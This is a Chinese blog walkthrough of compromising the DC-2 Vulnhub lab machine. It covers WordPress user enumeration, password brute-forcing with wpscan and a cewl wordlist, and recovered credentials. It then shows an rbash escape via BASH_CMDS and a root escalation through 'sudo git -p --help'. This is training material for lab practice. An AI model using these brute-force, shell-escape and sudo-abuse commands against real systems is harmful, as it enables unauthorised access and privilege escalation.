DC-2靶机渗透

2023-11-03

 

首先获取目标主机ip

netdiscover -i eth0 -r 192.168.88.1/24

对端口进行扫描,只开放了web服务

于是访问web

这里配置本地dns解析,将目标ip地址添加进hosts

成功访问,发现是wordpress。

此处提示我们使用cewl生成一个通用的字典,并且告诉了我们flag的位置。

先使用dirb 做一个简单的目录扫描

dirb http://dc-2/

发现后台地址

http://dc-2/wp-login.php?redirect_to=http%3A%2F%2Fdc-2%2Fwp-admin%2F&reauth=1

发现多个遍历,但是没有可以下载的东西没什么用

首先来个用户枚举,再尝试利用枚举到的用户爆破密码

wpscan –url http://dc-2 -e u 枚举出三个用户名

使用rockyou.txt 生成一个dc2.txt 的字典。同时利用枚举出的用户也生成一个密码字典。

接下来就是密码爆破了。

wpscan –url http://dc-2 –passwords /usr/share/wordlists/dc2.txt –usernames /root/dc2.txt

这个字典有点大也没有针对性。

刚才提示的是让我们利用 cewl 生成字典啊,那我们需要利用爬取网站的关键字重新生成字典。

cewl dc-2 > dc-2.txt

继续爆破

wpscan –url http://dc-2 –passwords /root/dc-2.txt –usernames /root/dc2.txt

Username: jerry, Password: adipiscing

Username: tom, Password: parturient

登录后台,又有提示信息

扫描全端口

nmap -sS -p- 192.168.88.189

进一步探测,找到一个ssh

nmap -sV -p 7744 dc-2

尝试使用之前爆破的用户名密码登录ssh

jerry 登录失败,但是tom 成功登录了………

使用tom登录后rbash限制,各种命令执行不通!!!

尝试绕过暂时没找到绕过方法,但是vi 可以使用,暂且使用 vi 查看flag3.TXT 内容。

大概意思是提示我们切换jerry账户

关于rbash 绕过可以参考以下两篇文章:

https://www.4hou.com/penetration/11674.html

https://www.jianshu.com/p/a977856e8629

但是这并没有解决我的问题!

以下方法成功绕过 rbash 限制

https://blog.csdn.net/qq_38677814/article/details/80003851

rbash 限制绕过(又差点猝死!!!)

1.r意味着restrict

2.使用BASH_CMDS[a]=/bin/sh;a

3.

$ export PATH=$PATH:/bin/

$ export PATH=$PATH:/usr/bin

4. echo /*查看文件

切换 到 jerry ,在jerry 家目录下找到第四个flag

flag4 提示我们可以使用git,我们可以通过git来提权

sudo -l 我们可以看到无需root权限,jerry 可以使用 git !

我们可以利用suid 进行提权

SUID可以让调用者以文件拥有者的身份运行该文件

已知可用来提权的linux文件: Nmap Vim find Bash More Less Nano

查找系统上运行的所有SUID可执行文件。

find / -user root -perm -4000 -print 2>/dev/null

find / -perm -u=s -type f 2>/dev/null

find / -user root -perm -4000 -exec ls -ldb {} \;

输入sudo git -p –help

输入!/bin/bash 获得root权限,并且在root目录下找到最后一个flag!!!

我似乎在这条道路上有着用不完的激情

接下来的日子里,生死未卜~

本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)

DC-2靶机渗透 的相关文章

  • 【vulnhub靶场之DC2靶机渗透】

    目录 一 前言 二 渗透过程 一 前言 大家好 xff0c 又到了快乐的学习时光了 xff0c 最近也是沉迷于DC系列的靶场 xff0c 每一次成功拿下靶场后都会学习和总结到很多的东西 今天的受害者是DC 2靶场 xff0c 话不多说 xf
  • sqli-labs靶场challenges第54-75关(超详细)

    目录 第五十四关 单引号闭合 第五十五关 括号闭合 第五十六关 单引号 括号闭合 第五十七关 双引号闭合 第五十八关 单引号闭合报错注入 第五十九关 数字型报错注入 第六十关 双引号 括号闭合 第六十一关 单引号 双括号闭合报错注入 第六十
  • 看完这篇 教你玩转渗透测试靶机vulnhub——DC2

    Vulnhub靶机DC2渗透测试详解 Vulnhub靶机介绍 Vulnhub靶机下载 Vulnhub靶机安装 Vulnhub靶机漏洞详解 信息收集 暴力破解 登入后台 PATH环境变量 GIT 提权 Vulnhub靶机渗透总结 Vulnhu
  • 【Vulnhub】搭建Vulnhub靶机

    一 Vulnhub介绍 Vulnhub它是一个提供各种网络攻防靶场的平台 里面大部分的环境是要用VMware或者VirtualBox打开运行的 二 下载 去vulnhub的官网 https www vulnhub com可以看到各种镜像 点
  • 渗透靶机测试之DC:1

    一 查看靶机要求 需要通过这个靶机来获得五个标志 在root的主目标中查找和读取 那就是直接拿到这个靶机的权限就行了 二 进行主机发现 三 对主机进行详细扫描及浏览主页 在网上查找Drupal 发现这个cms存在漏洞 打开msf进行漏洞查找
  • DC-2靶机渗透

    首先获取目标主机ip netdiscover i eth0 r 192 168 88 1 24 对端口进行扫描 只开放了web服务 于是访问web 这里配置本地dns解析 将目标ip地址添加进hosts 成功访问 发现是wordpress
  • dc-1 靶机渗透学习

    环境 Vmware 虚拟机软件 dc 1 靶机ip地址 192 168 202 130 kali攻击机ip地址 192 168 202 129 本次渗透过程kali攻击机和dc靶机都采取NAT模式 信息收集 首先用ipconfig查看当前k
  • vlunhub系列之Momentum2

    靶机Momentum2 如果主机发现发现不了ip地址请看这里 https hackergu com vulnhub ip arp scan主机发现nmap端口扫描 端口扫描 发现并没有可以利用的内容 我们使用dirb nikto 以及dir
  • 打靶练习:DC-1

    文章目录 主机发现和nmap信息收集 web信息收集 漏洞扫描 密码爆破 获得系统立足点 MySQL渗透 web渗透 用户提权 总结 主机发现和nmap信息收集 主机发现 kali kali sudo arp scan l 查找到主机地址为
  • Docker搭建BWAPP靶场

    buggy web Application 这是一个集成了各种常见漏洞和最新漏洞的开源Web应用程序 目的是帮助网络安全爱好者 开发人员和学生发现并防止网络漏洞 包含了超过100种漏洞 涵盖了所有主要的已知Web漏洞 包括OWASP Top
  • dc-7 靶机渗透学习

    信息收集 扫描当前网段 nmap sP 192 168 202 0 24 查看开启的端口服务 nmap A p v 192 168 202 146 访问靶机的80端口 通过Wappalyzer识别出是Drupal 8 先看一下靶机的说明 不
  • sqli-labs(39关-53关)

    目录 第三十九关 第四十关 第四十一关 第四十二关 第四十三关 第四十四关 第四十五关 第四十六关 第四十七关 第四十八关 第四十九关 第五十关 第五十一关 第五十二关 第五十三关 第三十九关 id 1 and 1 1 id 1 and 1
  • WebGoatV8.1(challenges)详细过关教程

    一 Admin lost password 设置代理继续抓包 刷新题目本页面 抓取url路径为 WebGoat challenge logo的包 重放在回应包里面搜索admin找到账号和密码 登录拿到flag 二 Without passw
  • HackInOS靶机渗透writeup

    HackInOS靶机渗透writeup 0x00准备测试环境 导入下载好的HackInOS ova文件后 将网络设置成桥接模式 并使用DHCP分配IP 成功后打开的靶机图如下 0x01渗透过程 使用nmap扫描确定目标机器IP nmap s
  • WAMP/DVWA/sqli-labs 搭建

    资料下载 Win7x64 ed2k file cn windows 7 enterprise with sp1 x64 dvd u 677685 iso 3265574912 E9DB2607EA3B3540F3FE2E388F8C53C4
  • dc-3 靶机渗透学习

    靶机修复 dc 3靶机可能会存在扫不到靶机ip的问题 可以参考下面这篇博客解决 编辑网卡配置文件时命令有点错误 vim etc network interfacers 改成 vim etc network interfaces Vulnhu
  • 【Vulnhub】之symfonos1

    一 部署方法 在官网上下载靶机ova环境 https download vulnhub com symfonos symfonos1 7z 使用VMware搭建靶机环境 攻击机使用VMware上搭建的kali 靶机和攻击机之间使用NAT模式
  • XSS之xss-labs-level11

    文章目录 0x01 XSS Labs 0x02 实验工具 0x03 实验环境 0x04 实验步骤 0x05 实验分析 0x06 参考链接 0x01 XSS Labs XSS 跨站脚本攻击 是指恶意攻击者往Web页面里插入恶意Script代码
  • dc-8 靶机渗透学习

    信息收集 扫描当前网段 nmap sP 192 168 202 0 24 扫描开放端口 nmap A p v 192 168 202 147 访问靶机的80端口 用Wappalyzer识别框架 随便看看页面 简单对存在的参数进行sql测试
  • pikachu Unsafe Filedownload 不安全的文件下载 (皮卡丘漏洞平台通关系列)

    这关也几乎是一步就能搞定 1 轻松过关 进入本关看到下图的页面 点击球员名字可以下载头像图片 点击之后直接下载了 没有页面跳转 地址栏的url没有变化 右键 查看网页源代码 通过球员名称快速定位到相关代码 类似 a href execdow

随机推荐